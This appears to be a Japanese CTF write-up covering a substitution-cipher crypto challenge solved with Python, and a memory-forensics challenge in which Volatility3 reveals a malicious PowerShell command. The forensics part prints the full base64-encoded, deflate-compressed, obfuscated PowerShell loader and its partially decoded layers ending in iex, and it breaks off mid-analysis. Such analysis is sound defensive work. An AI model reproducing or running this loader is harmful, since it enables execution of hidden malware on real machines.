[crypto] Revolving Letters
換字式暗号(言い方違うかも)が与えられる。
もともとのアルゴリズムを見ながら復元アルゴリズムを考えるが、キーに対して特定の文字が特定の文字に一対一対応で変換されることを利用して、
平文を全探索し、暗号化後に暗号化文と一致するかどうかで平文を復元していく。
これは各桁の文字毎に行えるので、全探索アルゴリズムとしてはO(|S|*文字数)くらいで復元可能。
LOWER_ALPHABET = "abcdefghijklmnopqrstuvwxyz" key='thequickbrownfoxjumpsoverthelazydog' flag_encrypted = 'RpgSyk{qsvop_dcr_wmc_rj_rgfxsime!}' def decrypt(encrypted, key): result = "" for i in range(len(encrypted)): if encrypted[i] not in LOWER_ALPHABET: # Don't encode symbols and capital letters (e.g. "A", " ", "_", "!", "{", "}") result += encrypted[i] continue for idx in range(len(LOWER_ALPHABET)): if encrypted[i] == LOWER_ALPHABET[(idx + LOWER_ALPHABET.index(key[i])) % 26]: result += LOWER_ALPHABET[idx] return result decrypted = decrypt(flag_encrypted, key) print(f"{decrypted=}")
[forensics] My name is Power!
stringsで適当に出てきたリテラルを見てみると、Windowsのメモリダンプのように見える。
とりあえず、Volatility3で解析してみる。
$ vol.py -f memory.raw windows.info.Info Volatility 3 Framework 2.4.1 Progress: 100.00 PDB scanning finished Variable Value Kernel Base 0xf80648600000 DTB 0x1ae000 Is64Bit True IsPAE False layer_name 0 WindowsIntel32e memory_layer 1 FileLayer KdVersionBlock 0xf806492099b8 Major/Minor 15.22621 MachineType 34404 KeNumberProcessors 4 SystemTime 2023-04-18 08:45:26 NtSystemRoot C:\Windows NtProductType NtProductWinNt NtMajorVersion 10 NtMinorVersion 0 PE MajorOperatingSystemVersion 10 PE MinorOperatingSystemVersion 0 PE Machine 34404 PE TimeDateStamp Tue Aug 10 18:00:02 1982
ok.
使えそう。ありがたい。
各種抜き取りをしていく。
windows.cmdlineの結果を眺めると明らかに怪しい実行履歴がある。
2068 powershell.exe pOwERsHEll -eP bYpASs -e JgAgACgAIAAkAFAAcwBIAE8AbQBlAFsANABdACsAJABwAHMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACAATgBFAFcALQBvAEIAagBFAEMAdAAgAEkATwAuAEMATwBtAFAAcgBFAHMAcwBpAG8ATgAuAEQAZQBmAGwAYQB0AEUAUwBUAHIAZQBhAE0AKABbAHMAeQBTAHQARQBNAC4ASQBvAC4ATQBlAG0ATwBSAFkAUwB0AHIAZQBBAE0AXQAgAFsAQwBvAE4AdgBFAHIAVABdADoAOgBmAFIAbwBNAEIAQQBTAGUANgA0AFMAdABSAGkATgBnACgAJwBmAFYAZABaAGMAOQBwAEkARQBQADQAcgBVADYAbgBkAEkAQgBXAEkAUQBnAGYAWQBRAFAAawBCAFkAOQBtAFEAbQBHAE0AQgB1ACsASwBsAGUASgBEAGwAdwBTAGoARwBFAGgAYQBLAGIAVQBxAGwALwA3ADUAZgB6AHkARgBJAEgAagBaAGwATgBEADAAOQAzAFQAMwBUAGQANABmAFYAbQBjAEgAKwBlAHYAZgBUAHgAOABtAGUAVAAxAFAALwBtAHMALwA0AE8AUABUAHIAaQAyAFMALwBTAEkAZgB4AHMAMgBFAHUANwBaAHEANwBxAGwAWgArAFYASwB5AGYAawAyAGgAYwBxAFoAZwBHAC8AbgAzAEoAbgBYAGEAUgBOADQAdgBjAFAAYwBlAEMAMQBTADUAeQByADEAWABrAHoAaABsACsAKwBBAFAAbwB1AHYAZwBSAEcAcQB1AEQARgBmAFMARQBwAFYAUAB3AHUATgBpADYASAB2AGkASQBsADIAUQBBAGIAbwBMAFMAQgBvADAASABJAFkAUQBDAGsAdwAxAFUAcwB3AEUAVwB1AGcAcABvAEYAOABkAE4ARQBrAEYAQwBzAFIASQBIAEoASQBIAFoAQgBWAFUAVABGAEIANgAyAEIARQBLAEEAZwA5AFcAagBIAHcAZwA5AEMASABOAEEANQB0AEYAOQB0AEsAZQA3ADYAWABXAGcAcwAwAEYAagBnADcAVQBKADQAVgBoAHMAawB0AFkAcwB2AGwAagByAFMAagA2ADkAKwAwAHkAVAB6AFgAeABRAHgAZQAvAHoAMABWAG8AVgBVAGEANQAyAE8ARgBrAFcAagAwAFIAdwBRAFYAaQB4AHYAYQBRAGwATgA2AHQAVgBpAGUAaABlAEQANABQAE4ANAB2ADMAaAAyADAAMwBzADQAMwB0AGIAcQBWAFgAQQB5AEgAZwAvADIATwA3ADQAegBQAEwAYwAxAFMAegBZADkASgBjADEAcwAzAEUAbQBvAGEAcQByAGcAYgBPADIAQgBJAHkAUwBtAHIAWABjAEYAUQBRAE0AdQBrAFcAMwAwAFcAaQB4AC8AVgBPAGMAaABIAHgAdQBNAFgAUAAzAEUAbQAzAG4AVgBwAFkARwAyAFIAeABnAGIAZgBjAEMASwBnAEQAWgBUAHUANgBpAFEAOQBxAHYASAA3AEkAbwAvAFIAVgBpAHMANwBZAFkASABsAFUANABlAGQASABLAGkAMgBaAGUAdABQAFAAQwB6AFEAcwA3AEwAeABwADUAYwBaAFkAWABZAEIAVQA4AC8AQwBjACsAYgBHADAAcAAyAGcAYQBSAEEARABiAHEAUwBuAGwAMgB3AFkAbwBOAFYARgBMAGIAdQBkAEMAVwBYAHAATAB5AHAAKwBnADkAVQBUAGYAegBIAGoANgBiAE8AWQBTAHkAMwBHAEQATABHAGIALwBoAFAAMQBhAGQAegBtAHMAdgA2AHcALwA4AHYAZgBIAHYAMQBZADAASgBaAHYAeQBOAG8AOABrADMAYQA5AFYAMABhAGsAMgA3ADUAaQAzADcALwBoAFEAcwBVAHYATAB6AG0ATgAvAGkANAByAHEAMABOAEsAcwAxAFcARQAyAEMAQgBuADkASgAzAHUATgBoAG4AUwA3AGQAeAAwAEYASwBOADAAbgA3AEUAbAB2AEcAOQB6AGsAegBiAGYAYgBHAEwAWABZAEkAcgB1AG8AbQB6ADQASQByAEsAKwBNADMAQgBuAHUASwBBADQAdAA1ADcARQAwAFMARgB3AE0AaAA5ADQASwBzAGMAdQBEAFEANgBFAFgAYwAxAHAATQBLAG0AYwBWADMAZQBaAGMAUwBlADMATABsAFQAcQBPAGkAbQBvAEwASQA1AHYAeABHAHEANQA0AGQATABvAFcANQByADkAWABwAG4ANABZAHMANwBvAFIAawB3AEkATgA5AFEASwBiADAARgA3ACsAbQBJADYAdwBUAC8ARQBMAHgAQwBIAEQAaABrAFQAQwB5AHMAQQBiADUAZgBxAGYAOQBFADMAeABrADYAMgBUAHUAVAAzAFkAdgBTAHIAegBBAHIAdABYAGwAMQA0AHMAKwBIAFEAbgA0AEUAeQB4AFMAUwBlAEcAZgBWADQAWAAyAHoANgA4AFgAZAAvAFgAcwBVADcASAB6AFIAYgAxADgAKwBQADYAZwA0AGkAaAA2AFYAbQBzAGMAUABTAFYAaABUAEIAZABBAEcAQwB5ADYAeQBlAEoAawBkAEcASgBUAFkAdwAwAHYARAB3AHkARAB3AGEATwBNAHoARQBGAGgASQBvAEIAMABlAEQAUABJAEYAcwBuAFcAWAB5ADgASQBaAFYAcgBmAGsAaQBoAG0AMAB1AGsAbQBPADAAcwB6ADkAdABWAGcAdwB4AEgARQAxAGcAcwB1AFAAVQBGADYAMABwAFAAZwBrAHQASgAwADkANwBEAEoAOABNAFEAeABvAEsARwBEAG8AUABCAHkAVwBKAFgAaQBxADcAZwBDAGkAWgBEAFEAVgBWAHkAbQB3AFgARQBBAGcAZwBhAGkAKwAxAHcAWQBYAGUAUgBLAEYAaQBxAHQASABpAGYAVwBCAHgAKwBMAGQAQwBGAFAAcABNAGsAYQBEAHEAYwBRADEAdQBlAFAAdABqAGEAbwBxACsAMABNADIAagAzADIAeAB0AGQAdQA4AGUAUgBMAG8ANQBJAEgARgArAC8AawBtAEMAZQBpADEAcwA5AFgAaQBUAGoAMQBrAGIAbgBNADEARwA4AFMAdQBDAEUAUgA2ACsAegBrADkATQBxADAAYgB4AEUATgBvAEoAZQBJAEQAdABmAE0ARwBJADQAZQBlAFAAegBlADYAVQA5AEcAMAA3AHUARgBQAHgAdgAzAFIAagA2AHoAKwBCAHUAWgBlAEQAYgBzAHoALwAwACsAWgBZACsAKwBqAEEAUgBGADcAeQBsAFgATQB1AGYASgBTAFgAUwBLAFkASgBWAHIAdABqAHQAbwA1AGUAYgBhADMAOAA4ADYAVwBTAEYAcgBqAEYAZQBZAEQAbABXAGUAUQBiAGgAYwBQAGMAZgBEADIAVwBLAFAANgB1AFEAMQBKAGEAWgBxADIANwBhAEMAdgBJAGEAQwBEAEkAcABnAEgAdgBhADIAVQA3AEoALwBTAGoANABTAFIAcgB4AFcAVQBwAE4ATgBSADAARgAzAGEAbAAzADAAagAvAGsAaQBnAGoAYgBaAEoAMgBrAFkASwBlAFMAbwBwAFkAQgBrAG8ANwBWAHAASgBaAHQATQBnAGYAMwB2AG0AaQB1AFoAdAB4AFMAVQBCAGgAOQBsAHQAYQBEADkAUwA1AGgAcwBMADcAZQBCAE8ASgBXAFYAVQBOAGMAcwBWAGYAdABrAHMAVgBOAEkAUgA2ADAAeQBLAGUARgBWAEcAWQBYADgAMQB6AGEANABsADcAVQAxADUAbQBWAGUAUABjAG0ATQBSAGwARwBYAFQARgBwAEkAbQBkAFcATQB2AHcAWQA2AFIAZABWAFoASABGADIALwBJAHIAUQAwAHAAeQBvAEMAVgBIAE4AUABiADYAWQA4AG4AMgAvADQANwBlADMAdwBhAG0AbQB2AHEAbgBBACsANwBiAFkAUgBkAHUAaQA5ADEASABzAG8AZQBvAHEAdQBMAEYAcQBCAHIAdQB3ADYAVQBiAFcAcAArAEgATQBRAEsANwBIAEIAcQBOAFYAMABlAGcAbwAvAG0ATgBjAFAAcABlAE0AaABBADYAcABTAEIAYgA4AHIAeQB3AEsAeQBYAHAAMQB2AFIATwBoAFEAbgBJADgAbQBZAGUAYwArADUAbgBnAEwATQArAHAASQBWAGIATgBkADkAaQB0AEgAQgBJAEwAbwBVAHcAMABOAE4AVABWAGsAOABIADcAdgBkAHUAbwBqAHAAbABzAEkASgBVAGgAYQBpAEsAZwBmAG4AUABTAGUAaAB0AFoAZAAyAGUAMgAzAFkAcwA2ADEAdAB4AFcAUgBEAG4ASwB6ADMAVgBxAGwAUABZAHEAKwA5AHAAawBDAEcAbwA0AHQASQBWAGcAKwBEAEwAYQBnADEAUABYADMAbwBKAGcAdgBNAC8ANgAvAFoAUgBnAGYAWgBBADQAcQA3AGoAdwBBADIARgBGAFUASABmAHYANwA4AEoALwAyAG4AaQBLAEIAWABSAFEAdgB1AHAAZABmAGoAVABuAFIAcgBtAFcAVQBJADEASABFADMAVABXAFIAdQBEAHIARgAxAHMAZgBHADIAUgBaAE4AMQBoAE4AOQBWAGcAYQBkAFEANQBXAEkAKwBxAHcAcgAxAFoAWQBWAGkAYwBKAFUANgAvAHoAWgBPAFkAMABVAFcAMABUAEsAbQBaAEQAZwBDAFEAbQB0ADMAeABpAGYAUgBTADAAeQBMAHUAVABnAHcAVgBqAFgAWgBEAHIAWQA2AFYAdwBiAFkAeABLAE8ATQBkAEIAOQArAG0AVQBOAGkAMgBUAE8AagBmAHoASgBwADgANwBPAFkAMgByAHgAVgBQAGgATAB1AGwAbwBPAE8AbgBKAHEASQBhADgAZQBXADIAegBUAHIAdABjAGIARgBFAFgAdgBRACsAMQBOAFUASwA1AFcAUwA3AFMAKwB4ADIAVgBYAFIAVgBIAHAAUgBaAEkAOAAxAHAAUgBQADIAbAByADEAawBiADkAUQA4AFAANQBoAHIAMQBTAG4AZgByAGMANwBUAGkAMAA2AHUATgBNAHAAMQA2AFcANwBmAHQAagBzAEEAbAAzAEsAWABuAFgATABFAG0AYgBYADQAVgA4ADQAdAByAEEAMwBWAGYAKwAyAHMASwBFAG4AagBHAC8AYgB3AHEAeABhAGkAUgBKAHkAaABiAE0AYQB4AHoANQBSADMAdgB2AHoAVQBmAGQAUwAyAFMAOQBVAEsAUwAzAGQATABOAFAAWgBLAFUATwBLAGIAQwBMAGIAVgBMAEcAaQBXAHAASABkAEkARwBiADAARwBDAE4AaQA2AFcAOAA5AEwANQBLAGQAcgBXAE8AZgBLADkAKwB1AEEARgB2AFgAQwB0AEgAbQBUAGoAbwBZAHgANQBzAHMAOQBSAEwAOQBvAGcAOQArAEwAUABwAC8ARABHADYAcQBYAFcANwAyAHUARgBYAFAAcwBuAGcAbAAwAEgAbwBjAFMASwBrAE4AaQBOAEQAUQBUAFAASgBhAE8AYQBvAEUAYQBrAFoAQwBpAHoANABPAHYAOQAzAGkAWABtAGoAQgBaAE4AOABxADgAegBjADkAcgBlADgAbgBvADUARgBXAHIAbgBSAG4AbwBtAE4AZQBZACsARAB6AE0AUABhAFAASQA0ADAAdQAyAEYAUwB3AFYAQwB6AEMAawBqAFQAUAA2AEoARwBWAG4AcgBmAGkAMAA0AGYARgBrAHUARgAvAE0AYwBJADQAOQBwAEcALwBTAHQAMQBnAGkAQQA4AEIAYgArADEAOQB4ADkAOAArAEIAdQBnAFgAOQA1AFEAMQBqAEwAMwA2ADIAZABDAEMAdABMADUAMgBLAFcAQQA5AGQANABuAFMAUQBkAHAAbABXADAAdgBOADgAbwAwAEwAQQBCAFgAVAB0AEYASQArADMAUQBZAGgAWgB4AFgAVQB4AEUAcAB0AEcAVwA2AEMAMgBjAHAAMgBQAE0AYgBLAEUAMQBaAEIAYwA5AFoASAByAG0AZQBGAE0AeAB6ADAANgBNAEIAUQA1AEEAMgB2AEsAcQBGAHoAVgB3AEYAbgBqAHEAawBaADIAawBlAEcAQwBxAHAAdgBLAGEAaABsAE0AdgBNAC8AJwApACAALAAgAFsAcwBZAFMAdABFAE0ALgBJAE8ALgBjAG8AbQBQAHIAZQBzAHMAaQBvAG4ALgBjAE8AbQBwAFIAZQBTAHMASQBvAE4AbQBPAGQAZQBdADoAOgBEAGUAQwBvAG0AcAByAEUAUwBTACkAfAAlAHsAIABOAEUAVwAtAG8AQgBqAEUAQwB0ACAASQBvAC4AUwB0AFIARQBBAE0AUgBlAGEAZABFAFIAKAAgACQAXwAgACwAWwB0AEUAeAB0AC4AZQBuAEMATwBEAGkATgBnAF0AOgA6AGEAUwBDAEkASQApACAAfQAgACkALgByAGUAYQBEAHQAbwBFAE4ARAAoACkAIAA=
ここまで来ると安心感ありますね。
これが"Power"か…
From base64 -> Decode text (UTF-16LE (1200))のレシピでCyberChefでデコードすると以下のような感じになる。
& ( $PsHOme[4]+$psHoME[34]+'X')( NEW-oBjECt IO.COmPrEssioN.DeflatESTreaM([syStEM.Io.MemORYStreAM] [CoNvErT]::fRoMBASe64StRiNg('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') , [sYStEM.IO.comPression.cOmpReSsIoNmOde]::DeComprESS)|%{ NEW-oBjECt Io.StREAMReadER( $_ ,[tExt.enCODiNg]::aSCII) } ).reaDtoEND()
deflateで圧縮されたものがbase64エンコードされているので、これもCyberChefで展開する。
From Base64 -> Raw Inflate
. ( $vErbOsePrEFeReNcE.TosTrIng()[1,3]+'X'-jOiN'')(((("{29}{5}{38}{55}{1}{46}{27}{2}{26}{33}{31}{43}{21}{9}{6}{32}{28}{39}{34}{15}{18}{54}{53}{16}{47}{8}{51}{13}{50}{25}{37}{36}{52}{23}{22}{3}{19}{4}{30}{57}{49}{0}{58}{20}{40}{42}{41}{24}{45}{12}{44}{11}{48}{10}{17}{56}{7}{14}{35}"-f'{PUxrohSH+hSHxb-]}i{hSH+hSHPUx[}b{PUx=]}i{PUx[}B{PUx{)++}i{PUx;FIahTvYJGnEvYJL','hSH eCalpeR-43]RahC[,)07]RahC[+37]RahC[+79]RahC[( eCalpeR- 63]','H;};006 sdnoceS- )pkilS-tratSpki,pk','pkitppki,pkiyrC.ytirucpkif- FIa}2{}6{}5{}9{}3{}1{}0{}7{}','i,pkiejpki f-FIa}2{}0{}1{FIa(.hSH+hSH = }hvYJhSH+hSHS{PUx;)pkiredivopki,pkieApkihS',' {( [ReGeX]::mAtCHEs(ZDG)hSHhSHNiOJ-]52,51,4[CEP','SH+hSHgNeLFIa.}b{PUx ,0 ,}b{PUx(ekovnI.)pkisnarpkih','hSH+hSHtes{ )1 qe- yaD.)etaD-teG( dna- 4 q','hSH}H{PUx = FIayevYJkFIa.}A{PUx;))}K{PUx(ehSH+hSHkovnI.)pkisphSH+hSHki,hSH+hSHpkiteGpki,pkietyBpkif-FhSH+hSHIa}2{}0{}1{FIa(.}U{PUx(FIaHsahvYJETuPMvYJOvYJcFIa.}hSH','YJh','SH','Hp','i,pkiawtfoSEOpkhSH+hSHi,pkifpki,pkiFTCEOpki,pkix','}H{PUx;)pkimpki,pkiE8FTU.txhSH+hSHeT.pki,pkietsySpki,pkigpki,pkinidocnpkif','e- htnoM.)etaD-teG((fihSH(( ZDG ,hSH.hSH ,hSHrIGHtTolEfThSH )-Join hSHhSH) 7rt &( IM','.}e{PUx =','H+hSH= FhSH+hSHIaVvYJIFIa.}A{PUx;','+hSHa}4{}2{',' }DvYJe{PUx;hSH+hSH)(e','4{}01{}8{FIa( )pkitcpki,pkibO-weNpk','PUx(rof;))pkirpki,pkibb1fpki,pki3pkhSH+hS','spki(&;}dE{PUx;)FIaHTv','idpki,','H+hSHi,pk','PER- )hSH+hSH)pk','I','ippki,pkiee','rC- )hS','ki','if (IMYenv:COMPUTERNAME -eq ZDGRICSECZDG)','H+hSH,pkiivrepki,pkiSophSH+hSHki,pkispki,pkitpyrpki,pkiS.pki,pkigopki,pki','N- ))29]RaHc[]gnIRTs[,)45]RaHc[+111]RaHc[+401]RaHc[((FIaecAlPvYJerFIa.))pkiFpki,pkioh:pki,pkiUpki,pkiTChSH+hSHpki,pkifosorcihSH+hSHM6hSH+hSHohepki,pki6ohtpki,pkiCKHpki,pkioS6pki,pkiraw','SH+hSH,pkikcolBlapki,p','pkihSH+hSH f- FIa}1{}0{}hSH+hSH2hSH+hSH{FIa(.;}de{PUx eulaV- )pkineifpki,pkidpkif-FIahSH+hSH}hSH+hSH0{}1{FIa( ema','i,pkihSH+hSHniFmrofpkif-FIa}2{}0{}3{}1hSH+hSH{FIa(','YSheLLID[1]+IMYSheLliD[13]+hSHxhSH)};','hSHapki,pkiySpki,pkiepki,pkieganhSH+hSHaM652Apki,pkiHS.ypki,pkiS.','a(. = }U{PUx;)pkietspki,pkihphSH+','sMOc:VneIMY (.7rt)93]RahC[,)211]RahC[+701]RahC[+501]RahC[(eCALPErC-69]R','Tpk','Hif- FIa}2{}0hSH+hSH{}1{FIa((ekovnI.)pkisetpki,pkihSH+hSH','H+hSH)96]rAHc[+97]rAHc[+021]rAHc[( ecal','Gpki,pkiyhSH+hSHBtepkif-FhSH+hSHIa}2{}0{}1{FIa(.FIaiivYJcSaFIa:hSH+hSH:1KIQ9sPUx =}k{PUx;FIaDNeivYJfFIa.))29]rAHc[,hS','pki,pkitfpki f-FIa}9{}6{}4{}5{}1{}0{}2{}8{}7{}3{FIa((( )pkip','tpki,pkix:pkif-FIa}2{}1{}3{}7{}5{}4{}0{}6{FIa((( )pkipgpki(&(=}B{PUx ;) hSH+hSH )pkiGpki,pkiOcNE.TxEhSH+hS','iosorciMEOxpki,pkiUCKHpki,pkierpk','RahC[,hSHPUxhSH eCALPE','hSH+hSH51..0 = }vIhSH+hSH{PUx]][etyb[;hSH+','kihSH+hSH,pkiNIhSH+hSHdpki,pkit.METpki,pkisYspkif-FIh','pyrC.ytirucepki,pkirPecpki,pki.yhparpki,pkimetsySpki f-FIhSH+hSHa}21{}2{}01{}9{}7{}4{}8{}11{}1{}hSH+hSH5{}hSH+hSH3{}6{}0{FIa( )pkicepki,pkijbOpki,pki-weNpki,pkitpki f-FIa}0{}3{}2{}1{FIa(. = }A{PUx;}]FIahtGvYJNeLFIa.}k{PUx%}i{PUx[}k','- FhSH+hSHIhSH+hSHa}hSH+hSH1{}0{}3{}4{}2{FIa( )pkitcejbO-pki,pkiNpki,pkiwephSH+hSHkif-FIa}2{}0{}1{F','+hSHhs{PUhSH+hSHx = ','mpki,pkirgopkhS','2{}0{}1{}3{}4{FIa(.}a{PUx = }e{hSH+hSHPUx;}Vi{PUx hS','kovnI.)pkirChSH+hSHpki,hSH+hSHpkithSH+hSHaepki,pkirotpki,pkiepki,pkipyrcnEpkhSH+hSHi f- FIa}','ahC[,hSHvYJ','}3{}1{}0{FIa(]ePYT[ ( )pki1pkhSH+hSHi+pkikIpki+pkiq9s:ElbairaVpki( mEtI-','Cpki,pkit','FIa.}hSH+hSHB{PUxtl-}i{PUx;0=}i{'))-rePlace '7rt',[chaR]124 -rePlace 'ZDG',[chaR]34-cRePlAce ([chaR]104+[chaR]83+[chaR]72),[chaR]39-cRePlAce 'IMY',[chaR]36) )
これを手動であれこれするのは大変そうなので、良い感じの環境で雑に動かして展開していく。
とりあえず最初の部分は
PS> $vErbOsePrEFeReNcE.TosTrIng()[1,3]+'X'-jOiN'' ieX
といういつもの感じなので、後半部分を文字列化して取り出してくる。
取り出し方として、ちゃんと手動解析してもいいが、隔離環境で雑に実行して取り出してきた。
リチェルカセキュリティに狙われている可能性もあるので、動かす環境には注意すること。
if ($env:COMPUTERNAME -eq "RICSEC") {( [ReGeX]::mAtCHEs(")''NiOJ-]52,51,4[CEPsMOc:Vne$ (.|)93]RahC[,)211]RahC[+701]RahC[+501]RahC[(eCALPErC-69]RahC[,'vYJ' eCalpeR-43]RahC[,)07]RahC[+37]RahC[+79]RahC[( eCalpeR- 63]RahC[,'PUx' eCALPErC- )';};006 sdnoceS- )pkilS-tratSpki,pkippki,pkieepki'+' f- FIa}1{}0{}'+'2'+'{FIa(.;}de{PUx eulaV- )pkineifpki,pkidpkif-FIa'+'}'+'0{}1{FIa( emaN- ))29]RaHc[]gnIRTs[,)45]RaHc[+111]RaHc[+401]RaHc[((FIaecAlPvYJerFIa.))pkiFpki,pkioh:pki,pkiUpki,pkiTC'+'pki,pkifosorci'+'M6'+'ohepki,pki6ohtpki,pkiCKHpki,pkioS6pki,pkirawpki,pkitfpki f-FIa}9{}6{}4{}5{}1{}0{}2{}8{}7{}3{FIa((( )pkipspki(&;}dE{PUx;)FIaHTvYJ'+'gNeLFIa.}b{PUx ,0 ,}b{PUx(ekovnI.)pkisnarpki'+',pkikcolBlapki,pkiTpki,pki'+'niFmrofpkif-FIa}2{}0{}3{}1'+'{FIa(.}e{PUx = }DvYJe{PUx;'+')(ekovnI.)pkirC'+'pki,'+'pkit'+'aepki,pkirotpki,pkiepki,pkipyrcnEpk'+'i f- FIa}2{}0{}1{}3{}4{FIa(.}a{PUx = }e{'+'PUx;}Vi{PUx '+'= F'+'IaVvYJIFIa.}A{PUx;'+'51..0 = }vI'+'{PUx]][etyb[;'+'}H{PUx = FIayevYJkFIa.}A{PUx;))}K{PUx(e'+'kovnI.)pkisp'+'ki,'+'pkiteGpki,pkietyBpkif-F'+'Ia}2{}0{}1{FIa(.}U{PUx(FIaHsahvYJETuPMvYJOvYJcFIa.}'+'hs{PU'+'x = }H{PUx;)pkimpki,pkiE8FTU.tx'+'eT.pki,pkietsySpki,pkigpki,pkinidocnpkif- F'+'I'+'a}'+'1{}0{}3{}4{}2{FIa( )pkitcejbO-pki,pkiNpki,pkiwep'+'kif-FIa}2{}0{}1{FIa(. = }U{PUx;)pkietspki,pkihp'+'apki,pkiySpki,pkiepki,pkiegan'+'aM652Apki,pkiHS.ypki,pkiS.mpki,pkirgopk'+'i,pkidpki,pkitppki,pkiyrC.ytirucpkif- FIa}2{}6{}5{}9{}3{}1{}0{}7{}4{}01{}8{FIa( )pkitcpki,pkibO-weNpki,pkiejpki f-FIa}2{}0{}1{FIa(.'+' = }hvYJ'+'S{PUx;)pkiredivopki,pkieApki'+',pkiivrepki,pkiSop'+'ki,pkispki,pkitpyrpki,pkiS.pki,pkigopki,pkiCpki,pkitpyrC.ytirucepki,pkirPecpki,pki.yhparpki,pkimetsySpki f-FI'+'a}21{}2{}01{}9{}7{}4{}8{}11{}1{}'+'5{}'+'3{}6{}0{FIa( )pkicepki,pkijbOpki,pki-weNpki,pkitpki f-FIa}0{}3{}2{}1{FIa(. = }A{PUx;}]FIahtGvYJNeLFIa.}k{PUx%}i{PUx[}k{PUxro'+'xb-]}i{'+'PUx[}b{PUx=]}i{PUx[}B{PUx{)++}i{PUx;FIahTvYJGnEvYJLFIa.}'+'B{PUxtl-}i{PUx;0=}i{PUx(rof;))pkirpki,pkibb1fpki,pki3pk'+'if- FIa}2{}0'+'{}1{FIa((ekovnI.)pkisetpki,pki'+'Gpki,pkiy'+'Btepkif-F'+'Ia}2{}0{}1{FIa(.FIaiivYJcSaFIa:'+':1KIQ9sPUx =}k{PUx;FIaDNeivYJfFIa.))29]rAHc[,'+')96]rAHc[+97]rAHc[+021]rAHc[( ecalPER- )'+')pkiosorciMEOxpki,pkiUCKHpki,pkierpki,pkiawtfoSEOpk'+'i,pkifpki,pkiFTCEOpki,pkixtpki,pkix:pkif-FIa}2{}1{}3{}7{}5{}4{}0{}6{FIa((( )pkipgpki(&(=}B{PUx ;) '+' )pkiGpki,pkiOcNE.TxE'+'pki'+',pkiNI'+'dpki,pkit.METpki,pkisYspkif-FI'+'a}4{}2{}3{}1{}0{FIa(]ePYT[ ( )pki1pk'+'i+pkikIpki+pkiq9s:ElbairaVpki( mEtI-'+'tes{ )1 qe- yaD.)etaD-teG( dna- 4 qe- htnoM.)etaD-teG((fi'(( " ,'.' ,'rIGHtTolEfT' )-Join '') | &( $SheLLID[1]+$SheLliD[13]+'x')};
標的型っぽく、RICSECというコンピュータだけを狙ったものみたい。
いや、サンドボックスで動かしただけではわからないようにしてあるということかも。
適当に探すと、いつものiexが出てくる。
PS> $SheLLID[1]+$SheLliD[13]+'x' iex
